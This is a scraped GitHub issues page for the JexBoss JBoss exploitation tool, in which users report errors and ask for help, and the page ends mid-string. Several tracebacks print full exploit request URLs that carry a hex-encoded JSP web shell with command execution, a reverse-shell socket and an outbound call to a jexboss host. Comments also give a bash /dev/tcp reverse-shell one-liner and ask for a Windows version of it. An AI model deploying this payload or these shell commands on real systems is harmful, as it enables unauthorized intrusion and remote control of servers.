joaomatosf / jexboss Goto Github PK
View Code? Open in Web Editor NEWJexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool
License: Other
JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool
License: Other
Hello
I've received this error while exploiting the target ::
Traceback (most recent call last):
File "jexboss.py", line 1155, in
main()
File "jexboss.py", line 932, in main
auto_exploit(url, vector)
File "jexboss.py", line 513, in auto_exploit
result = _exploits.exploit_jmx_console_file_repository(url)
File "/root/jexboss/_exploits.py", line 267, in exploit_jmx_console_file_repository
gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers)
File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 66, in request
**urlopen_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 87, in request_encode_url
return self.urlopen(method, url, **extra_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 244, in urlopen
response = conn.urlopen(method, u.request_uri, **kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 643, in urlopen
_stacktrace=sys.exc_info()[2])
File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 363, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='10.175.0.146', port=80): Max retries exceeded with url: /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=jexws4.war&argType=java.lang.String&arg1=jexws4&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61%2E%6C%61%6E%67%2E%2A%2C%6A%61%76%61%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%2C%6A%61%76%61%2E%6E%65%74%2E%2A%22%20%70%61%67%65%45%6E%63%6F%64%69%6E%67%3D%22%55%54%46%2D%38%22%25%3E%20%3C%70%72%65%3E%20%3C%25%20%63%6C%61%73%73%20%72%76%20%65%78%74%65%6E%64%73%20%54%68%72%65%61%64%7B%49%6E%70%75%74%53%74%72%65%61%6D%20%69%73%3B%4F%75%74%70%75%74%53%74%72%65%61%6D%20%6F%73%3B%72%76%28%49%6E%70%75%74%53%74%72%65%61%6D%20%69%73%2C%4F%75%74%70%75%74%53%74%72%65%61%6D%20%6F%73%29%7B%74%68%69%73%2E%69%73%3D%69%73%3B%74%68%69%73%2E%6F%73%3D%6F%73%3B%7D%70%75%62%6C%69%63%20%76%6F%69%64%20%72%75%6E%28%29%7B%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%69%6E%3D%6E%75%6C%6C%3B%42%75%66%66%65%72%65%64%57%72%69%74%65%72%20%6F%75%74%3D%6E%75%6C%6C%3B%74%72%79%7B%69%6E%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%74%68%69%73%2E%69%73%29%29%3B%6F%75%74%3D%6E%65%77%20%42%75%66%66%65%72%65%64%57%72%69%74%65%72%28%6E%65%77%20%4F%75%74%70%75%74%53%74%72%65%61%6D%57%72%69%74%65%72%28%74%68%69%73%2E%6F%73%29%29%3B%63%68%61%72%20%62%5B%5D%3D%6E%65%77%20%63%68%61%72%5B%38%31%39%32%5D%3B%69%6E%74%20%6C%3B%77%68%69%6C%65%28%28%6C%3D%69%6E%2E%72%65%61%64%28%62%2C%30%2C%62%2E%6C%65%6E%67%74%68%29%29%3E%30%29%7B%6F%75%74%2E%77%72%69%74%65%28%62%2C%30%2C%6C%29%3B%6F%75%74%2E%66%6C%75%73%68%28%29%3B%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%7D%7D%7D%53%74%72%69%6E%67%20%73%68%3D%6E%75%6C%6C%3B%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%21%3D%6E%75%6C%6C%29%7B%73%68%3D%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%3B%7D%65%6C%73%65%20%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%58%2D%4A%45%58%22%29%21%3D%20%6E%75%6C%6C%29%7B%73%68%3D%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%58%2D%4A%45%58%22%29%3B%7D%69%66%28%73%68%20%21%3D%20%6E%75%6C%6C%29%7B%72%65%73%70%6F%6E%73%65%2E%73%65%74%43%6F%6E%74%65%6E%74%54%79%70%65%28%22%74%65%78%74%2F%68%74%6D%6C%22%29%3B%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%72%3D%6E%75%6C%6C%3B%53%74%72%69%6E%67%20%6C%68%63%3D%28%6E%65%77%20%44%61%74%65%28%29%2E%74%6F%53%74%72%69%6E%67%28%29%2E%73%70%6C%69%74%28%22%3A%22%29%5B%30%5D%2B%22%68%2E%6C%6F%67%22%29%2E%72%65%70%6C%61%63%65%41%6C%6C%28%22%20%22%2C%22%2D%22%29%3B%74%72%79%7B%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%6E%6F%2D%63%68%65%63%6B%2D%75%70%64%61%74%65%73%22%29%3D%3D%6E%75%6C%6C%29%7B%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F%6E%20%63%3D%28%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F%6E%29%6E%65%77%20%55%52%4C%28%22%68%74%74%70%3A%2F%2F%77%65%62%73%68%65%6C%6C%2E%6A%65%78%62%6F%73%73%2E%6E%65%74%2F%6A%73%70%5F%76%65%72%73%69%6F%6E%2E%74%78%74%22%29%2E%6F%70%65%6E%43%6F%6E%6E%65%63%74%69%6F%6E%28%29%3B%63%2E%73%65%74%52%65%71%75%65%73%74%50%72%6F%70%65%72%74%79%28%22%55%73%65%72%2D%41%67%65%6E%74%22%2C%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%48%6F%73%74%22%29%2B%22%3C%2D%22%2B%72%65%71%75%65%73%74%2E%67%65%74%52%65%6D%6F%74%65%41%64%64%72%28%29%29%3B%69%66%28%21%6E%65%77%20%46%69%6C%65%28%22%63%68%65%63%6B%5F%22%2B%6C%68%63%29%2E%65%78%69%73%74%73%28%29%29%7B%50%72%69%6E%74%57%72%69%74%65%72%20%77%3D%6E%65%77%20%50%72%69%6E%74%57%72%69%74%65%72%28%22%63%68%65%63%6B%5F%22%2B%6C%68%63%29%3B%77%2E%63%6C%6F%73%65%28%29%3B%62%72%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%53%74%72%69%6E%67%20%6C%76%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%2E%73%70%6C%69%74%28%22%20%22%29%5B%31%5D%3B%69%66%28%21%6C%76%2E%65%71%75%61%6C%73%28%22%34%22%29%29%7B%6F%75%74%2E%70%72%69%6E%74%28%22%4E%65%77%20%76%65%72%73%69%6F%6E%2E%20%50%6C%65%61%73%65%20%75%70%64%61%74%65%21%22%29%3B%7D%7D%65%6C%73%65%20%69%66%28%73%68%2E%69%6E%64%65%78%4F%66%28%22%69%64%22%29%21%3D%2D%31%7C%7C%73%68%2E%69%6E%64%65%78%4F%66%28%22%69%70%63%6F%6E%66%69%67%22%29%21%3D%2D%31%29%7B%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%3B%7D%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%22%46%61%69%6C%65%64%20%74%6F%20%63%68%65%63%6B%20%66%6F%72%20%75%70%64%61%74%65%73%22%29%3B%7D%74%72%79%7B%50%72%6F%63%65%73%73%20%70%3B%62%6F%6F%6C%65%61%6E%20%6E%69%78%3D%74%72%75%65%3B%69%66%28%21%53%79%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%66%69%6C%65%2E%73%65%70%61%72%61%74%6F%72%22%29%2E%65%71%75%61%6C%73%28%22%2F%22%29%29%7B%6E%69%78%3D%66%61%6C%73%65%3B%7D%69%66%28%73%68%2E%69%6E%64%65%78%4F%66%28%22%6A%65%78%72%65%6D%6F%74%65%3D%22%29%21%3D%2D%31%29%7B%53%6F%63%6B%65%74%20%73%63%3D%6E%65%77%20%53%6F%63%6B%65%74%28%73%68%2E%73%70%6C%69%74%28%22%3D%22%29%5B%31%5D%2E%73%70%6C%69%74%28%22%3A%22%29%5B%30%5D%2C%49%6E%74%65%67%65%72%2E%70%61%72%73%65%49%6E%74%28%73%68%2E%73%70%6C%69%74%28%22%3A%22%29%5B%31%5D%29%29%3B%69%66%28%6E%69%78%29%7B%73%68%3D%22%2F%62%69%6E%2F%62%61%73%68%22%3B%7D%65%6C%73%65%7B%73%68%3D%22%63%6D%64%2E%65%78%65%22%3B%7D%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%73%68%29%3B%28%6E%65%77%20%72%76%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%2C%73%63%2E%67%65%74%4F%75%74%70%75%74%53%74%72%65%61%6D%28%29%29%29%2E%73%74%61%72%74%28%29%3B%28%6E%65%77%20%72%76%28%73%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%2C%70%2E%67%65%74%4F%75%74%70%75%74%53%74%72%65%61%6D%28%29%29%29%2E%73%74%61%72%74%28%29%3B%7D%65%6C%73%65%7B%69%66%28%6E%69%78%29%7B%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%6E%65%77%20%53%74%72%69%6E%67%5B%5D%7B%22%2F%62%69%6E%2F%62%61%73%68%22%2C%22%2D%63%22%2C%73%68%7D%29%3B%7D%65%6C%73%65%7B%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%22%63%6D%64%2E%65%78%65%20%2F%43%20%22%2B%73%68%29%3B%7D%62%72%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%53%74%72%69%6E%67%20%64%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%77%68%69%6C%65%28%64%20%21%3D%20%6E%75%6C%6C%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%64%29%3B%64%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%7D%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%22%55%6E%6B%6E%6F%77%6E%20%63%6F%6D%6D%61%6E%64%22%29%3B%7D%7D%25%3E&argType=boolean&arg4=True (Caused by ProtocolError('Connection aborted.', BadStatusLine("''",)))
Hi João,
is there anyway to call a real tty, or just making reverse connection ?
thanks!
I'd like to add support for the detection of this vulnerability, would you be interested if I submitted a pull request for this?
I'm executing in the correct syntax:
python jexboss.py -host https://host
I keep getting this returned:
parser.add_argument('-mode', help="Operation mode", choices={'standalone','auto-scan', 'file-scan'}, default='standalone')
What am I doing wrong? Thanks!
OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=error: dh key too small
I often get that kind of result when the code is deployed :
Example:
Shell>jexremote=192.168.0.10:4444
Or use other techniques of your choice, like:
Shell>/bin/bash -i > /dev/tcp/192.168.0.10/4444 0>&1 2>&1
And so on... =]
Thanks.
Hello,
Is it possible to add a "-y" flag for the exploit testing>? this way the code can essessionly perform an autoscan/exploint when running a individual host base scan
Unknown command
Unknown command
Failed to check for updates
Unknown command
[Type commands or "exit" to finish]
Shell> ls
Unknown command
[Type commands or "exit" to finish]
Shell> ipconfig
Failed to check for updates
Unknown command
[Type commands or "exit" to finish]
Shell>
Hello,
Suggestions? I saw the other list index out of range issue. Figured this is probably the same. Is code actually being uploaded? But not able to connect back to the reverse shell?
I'm running this externally and internally.
@Version: 1.0.11
Traceback (most recent call last):
File "./jexboss.py", line 532, in
main()
File "./jexboss.py", line 381, in main
auto_exploit(url, i)
File "./jexboss.py", line 230, in auto_exploit
shell_http(url, exploit_type)
File "./jexboss.py", line 271, in shell_http
resp += " " + str(r.data).split(">")[1]
IndexError: list index out of range
Is there a CVE or any writeups you can link to associated with commit 7411be3?
Hi friend,
I noticed that you provided a --load-gadget flag,is this means I can use ysoserial to generate payload?Can you tell me how did you generate the build-in payloads?
thaks!
When running on the default Kali 2016 install (or Ubuntu derivatives, etc.) The following error message is seen:
Traceback (most recent call last):
File "jexboss.py", line 23, in <module>
from idlelib.ColorDelegator import prog
ImportError: No module named idlelib.ColorDelegator
This is a dependency issue (https://pypi.python.org/pypi/cricket/0.2.3). Kali and Ubuntu’s packaging of Python omits the idlelib library from it’s base package.
Users can install idlelib by running:
$ sudo apt-get install idle-python2.7
can you tell me,what you use to create jsp shellcode??
like:
jsp = ("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61%2E%75%74%69%6C%2E%2A" "%2C%6A%61%76%61%2E%69%6F%2E%2A%2C%20%6A%61%76%61%2E%6E%65%74%2E%2A%22%20%70%61%67%65%45" "%6E%63%6F%64%69%6E%67%3D%22%55%54%46%2D%38%22%25%3E%20%3C%70%72%65%3E%20%3C%25%20%69%6E" "%74%20%76%65%72%73%69%6F%6E%20%3D%20%33%3B%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65" "%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20%6E%75%6C%6C%29%20%7B%20" "%62%6F%6F%6C%65%61%6E%20%63%68%65%63%6B%55%70%64%61%74%65%73%3B%20%48%74%74%70%55%52%4C" "%43%6F%6E%6E%65%63%74%69%6F%6E%20%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%20%3D" "%20%6E%75%6C%6C%3B%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%72%20%3D%20%6E%75" "%6C%6C%3B%20%72%65%73%70%6F%6E%73%65%2E%73%65%74%43%6F%6E%74%65%6E%74%54%79%70%65%28%22" "%74%65%78%74%2F%68%74%6D%6C%22%29%3B%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65%74%48" "%65%61%64%65%72%28%22%63%68%65%63%6B%2D%75%70%64%61%74%65%73%22%29%20%21%3D%20%6E%75%6C" "%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%63%68%65%63%6B" "%2D%75%70%64%61%74%65%73%22%29%2E%65%71%75%61%6C%73%28%22%66%61%6C%73%65%22%29%29%7B%20" "%63%68%65%63%6B%55%70%64%61%74%65%73%20%3D%20%66%61%6C%73%65%3B%20%7D%65%6C%73%65%20%7B" "%20%63%68%65%63%6B%55%70%64%61%74%65%73%20%3D%20%74%72%75%65%3B%20%63%6F%6E%6E%43%68%65" "%63%6B%55%70%64%61%74%65%73%20%3D%20%28%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F" "%6E%29%20%6E%65%77%20%55%52%4C%28%22%68%74%74%70%3A%2F%2F%77%65%62%73%68%65%6C%6C%2E%6A" "%65%78%62%6F%73%73%2E%6E%65%74%2F%6A%73%70%5F%76%65%72%73%69%6F%6E%2E%74%78%74%22%29%2E" "%6F%70%65%6E%43%6F%6E%6E%65%63%74%69%6F%6E%28%29%3B%20%7D%20%53%74%72%69%6E%67%20%73%68" "%20%3D%20%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22" "%29%3B%20%53%74%72%69%6E%67%20%6C%61%73%74%48%6F%75%72%43%68%65%63%6B%20%3D%20%28%6E%65" "%77%20%44%61%74%65%28%29%2E%74%6F%53%74%72%69%6E%67%28%29%2E%73%70%6C%69%74%28%22%3A%22" "%29%5B%30%5D%2B%22%68%2E%6C%6F%67%22%29%2E%72%65%70%6C%61%63%65%41%6C%6C%28%22%20%22%2C"
When I use -A in file-scan mode,I got something wrong.Is -A can only use in standalone mode?
Not sure it it is a bug or a feature, but if you try to exploit a vulnerability in a Windows target the Shell doesn't work. All the vulnerabilities are correctly identified though.
Hi, I want to add your tool into ArchStrike. Would it be possible to add a license file?
I'm getting the following SSL issue. Any way to fix this?
[*] Checking JMXInvokerServlet:
*** An error occurred while connecting to the host https://example.com/ ([SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:661))**
hello
thx for this good job
please if we have a windows server
how to interact with a metasploit windows listner.
i want the équivalent command to this one :
/bin/bash -i > /dev/tcp/attacker_IP/4444 0>&1 2>&1
thx
Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
Error: could not check for updates ...
** Checking Host: http://google.com **
[*] Checking JMX Tomcat:
Hi, on:
Python 2.7.12 (default, Nov 7 2016, 11:55:55)
[GCC 6.2.1 20160830] on linux2
after:
/opt/jexboss:
> sudo pip install -r requires.txt
Requirement already satisfied: urllib3>=1.8 in /usr/lib/python2.7/site-packages (from -r requires.txt (line 1))
Requirement already satisfied: ipaddress in /usr/lib/python2.7/site-packages (from -r requires.txt (line 2))
i've got problem with exploit:
** Checking Host: http://10.0.0.2:8081 **
* Checking admin-console: [ OK ]
* Checking web-console: [ VULNERABLE ]
* Checking jmx-console: [ VULNERABLE ]
* Checking JMXInvokerServlet: [ VULNERABLE ]
* Do you want to try to run an automated exploitation via "jmx-console" ?
This operation will provide a simple command shell to execute commands on the server..
Continue only if you have permission!
yes/NO? yes
* Sending exploit code to http://10.0.0.2:8081. Please wait...
Traceback (most recent call last):
File "./jexboss.py", line 681, in <module>
main()
File "./jexboss.py", line 520, in main
auto_exploit(url, i)
File "./jexboss.py", line 303, in auto_exploit
result = _exploits.exploit_jmx_console_file_repository(url)
File "/opt/jexboss/_exploits.py", line 176, in exploit_jmx_console_file_repository
gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers)
File "/usr/lib/python2.7/site-packages/urllib3/request.py", line 66, in request
**urlopen_kw)
File "/usr/lib/python2.7/site-packages/urllib3/request.py", line 87, in request_encode_url
return self.urlopen(method, url, **extra_kw)
File "/usr/lib/python2.7/site-packages/urllib3/poolmanager.py", line 244, in urlopen
response = conn.urlopen(method, u.request_uri, **kw)
File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 643, in urlopen
_stacktrace=sys.exc_info()[2])
File "/usr/lib/python2.7/site-packages/urllib3/util/retry.py", line 363, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='10.0.0.2', port=8081): Max retries exceeded with url: /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=jexws4.war&argType=java.lang.String&arg1=jexws4&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61%2E%6C%61%6E%67%2E%2A%2C%6A%61%76%61%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%2C%6A%61%76%61%2E%6E%65%74%2E%2A%22%20%70%61%67%65%45%6E%63%6F%64%69%6E%67%3D%22%55%54%46%2D%38%22%25%3E%20%3C%70%72%65%3E%20%3C%25%20%63%6C%61%73%73%20%72%76%20%65%78%74%65%6E%64%73%20%54%68%72%65%61%64%7B%49%6E%70%75%74%53%74%72%65%61%6D%20%69%73%3B%4F%75%74%70%75%74%53%74%72%65%61%6D%20%6F%73%3B%72%76%28%49%6E%70%75%74%53%74%72%65%61%6D%20%69%73%2C%4F%75%74%70%75%74%53%74%72%65%61%6D%20%6F%73%29%7B%74%68%69%73%2E%69%73%3D%69%73%3B%74%68%69%73%2E%6F%73%3D%6F%73%3B%7D%70%75%62%6C%69%63%20%76%6F%69%64%20%72%75%6E%28%29%7B%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%69%6E%3D%6E%75%6C%6C%3B%42%75%66%66%65%72%65%64%57%72%69%74%65%72%20%6F%75%74%3D%6E%75%6C%6C%3B%74%72%79%7B%69%6E%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%74%68%69%73%2E%69%73%29%29%3B%6F%75%74%3D%6E%65%77%20%42%75%66%66%65%72%65%64%57%72%69%74%65%72%28%6E%65%77%20%4F%75%74%70%75%74%53%74%72%65%61%6D%57%72%69%74%65%72%28%74%68%69%73%2E%6F%73%29%29%3B%63%68%61%72%20%62%5B%5D%3D%6E%65%77%20%63%68%61%72%5B%38%31%39%32%5D%3B%69%6E%74%20%6C%3B%77%68%69%6C%65%28%28%6C%3D%69%6E%2E%72%65%61%64%28%62%2C%30%2C%62%2E%6C%65%6E%67%74%68%29%29%3E%30%29%7B%6F%75%74%2E%77%72%69%74%65%28%62%2C%30%2C%6C%29%3B%6F%75%74%2E%66%6C%75%73%68%28%29%3B%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%7D%7D%7D%53%74%72%69%6E%67%20%73%68%3D%6E%75%6C%6C%3B%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%21%3D%6E%75%6C%6C%29%7B%73%68%3D%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%3B%7D%65%6C%73%65%20%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%58%2D%4A%45%58%22%29%21%3D%20%6E%75%6C%6C%29%7B%73%68%3D%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%58%2D%4A%45%58%22%29%3B%7D%69%66%28%73%68%20%21%3D%20%6E%75%6C%6C%29%7B%72%65%73%70%6F%6E%73%65%2E%73%65%74%43%6F%6E%74%65%6E%74%54%79%70%65%28%22%74%65%78%74%2F%68%74%6D%6C%22%29%3B%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%72%3D%6E%75%6C%6C%3B%53%74%72%69%6E%67%20%6C%68%63%3D%28%6E%65%77%20%44%61%74%65%28%29%2E%74%6F%53%74%72%69%6E%67%28%29%2E%73%70%6C%69%74%28%22%3A%22%29%5B%30%5D%2B%22%68%2E%6C%6F%67%22%29%2E%72%65%70%6C%61%63%65%41%6C%6C%28%22%20%22%2C%22%2D%22%29%3B%74%72%79%7B%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%6E%6F%2D%63%68%65%63%6B%2D%75%70%64%61%74%65%73%22%29%3D%3D%6E%75%6C%6C%29%7B%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F%6E%20%63%3D%28%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F%6E%29%6E%65%77%20%55%52%4C%28%22%68%74%74%70%3A%2F%2F%77%65%62%73%68%65%6C%6C%2E%6A%65%78%62%6F%73%73%2E%6E%65%74%2F%6A%73%70%5F%76%65%72%73%69%6F%6E%2E%74%78%74%22%29%2E%6F%70%65%6E%43%6F%6E%6E%65%63%74%69%6F%6E%28%29%3B%63%2E%73%65%74%52%65%71%75%65%73%74%50%72%6F%70%65%72%74%79%28%22%55%73%65%72%2D%41%67%65%6E%74%22%2C%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%48%6F%73%74%22%29%2B%22%3C%2D%22%2B%72%65%71%75%65%73%74%2E%67%65%74%52%65%6D%6F%74%65%41%64%64%72%28%29%29%3B%69%66%28%21%6E%65%77%20%46%69%6C%65%28%22%63%68%65%63%6B%5F%22%2B%6C%68%63%29%2E%65%78%69%73%74%73%28%29%29%7B%50%72%69%6E%74%57%72%69%74%65%72%20%77%3D%6E%65%77%20%50%72%69%6E%74%57%72%69%74%65%72%28%22%63%68%65%63%6B%5F%22%2B%6C%68%63%29%3B%77%2E%63%6C%6F%73%65%28%29%3B%62%72%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%53%74%72%69%6E%67%20%6C%76%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%2E%73%70%6C%69%74%28%22%20%22%29%5B%31%5D%3B%69%66%28%21%6C%76%2E%65%71%75%61%6C%73%28%22%34%22%29%29%7B%6F%75%74%2E%70%72%69%6E%74%28%22%4E%65%77%20%76%65%72%73%69%6F%6E%2E%20%50%6C%65%61%73%65%20%75%70%64%61%74%65%21%22%29%3B%7D%7D%65%6C%73%65%20%69%66%28%73%68%2E%69%6E%64%65%78%4F%66%28%22%69%64%22%29%21%3D%2D%31%7C%7C%73%68%2E%69%6E%64%65%78%4F%66%28%22%69%70%63%6F%6E%66%69%67%22%29%21%3D%2D%31%29%7B%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%3B%7D%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%22%46%61%69%6C%65%64%20%74%6F%20%63%68%65%63%6B%20%66%6F%72%20%75%70%64%61%74%65%73%22%29%3B%7D%74%72%79%7B%50%72%6F%63%65%73%73%20%70%3B%62%6F%6F%6C%65%61%6E%20%6E%69%78%3D%74%72%75%65%3B%69%66%28%21%53%79%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%66%69%6C%65%2E%73%65%70%61%72%61%74%6F%72%22%29%2E%65%71%75%61%6C%73%28%22%2F%22%29%29%7B%6E%69%78%3D%66%61%6C%73%65%3B%7D%69%66%28%73%68%2E%69%6E%64%65%78%4F%66%28%22%6A%65%78%72%65%6D%6F%74%65%3D%22%29%21%3D%2D%31%29%7B%53%6F%63%6B%65%74%20%73%63%3D%6E%65%77%20%53%6F%63%6B%65%74%28%73%68%2E%73%70%6C%69%74%28%22%3D%22%29%5B%31%5D%2E%73%70%6C%69%74%28%22%3A%22%29%5B%30%5D%2C%49%6E%74%65%67%65%72%2E%70%61%72%73%65%49%6E%74%28%73%68%2E%73%70%6C%69%74%28%22%3A%22%29%5B%31%5D%29%29%3B%69%66%28%6E%69%78%29%7B%73%68%3D%22%2F%62%69%6E%2F%62%61%73%68%22%3B%7D%65%6C%73%65%7B%73%68%3D%22%63%6D%64%2E%65%78%65%22%3B%7D%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%73%68%29%3B%28%6E%65%77%20%72%76%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%2C%73%63%2E%67%65%74%4F%75%74%70%75%74%53%74%72%65%61%6D%28%29%29%29%2E%73%74%61%72%74%28%29%3B%28%6E%65%77%20%72%76%28%73%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%2C%70%2E%67%65%74%4F%75%74%70%75%74%53%74%72%65%61%6D%28%29%29%29%2E%73%74%61%72%74%28%29%3B%7D%65%6C%73%65%7B%69%66%28%6E%69%78%29%7B%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%6E%65%77%20%53%74%72%69%6E%67%5B%5D%7B%22%2F%62%69%6E%2F%62%61%73%68%22%2C%22%2D%63%22%2C%73%68%7D%29%3B%7D%65%6C%73%65%7B%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%22%63%6D%64%2E%65%78%65%20%2F%43%20%22%2B%73%68%29%3B%7D%62%72%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%53%74%72%69%6E%67%20%64%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%77%68%69%6C%65%28%64%20%21%3D%20%6E%75%6C%6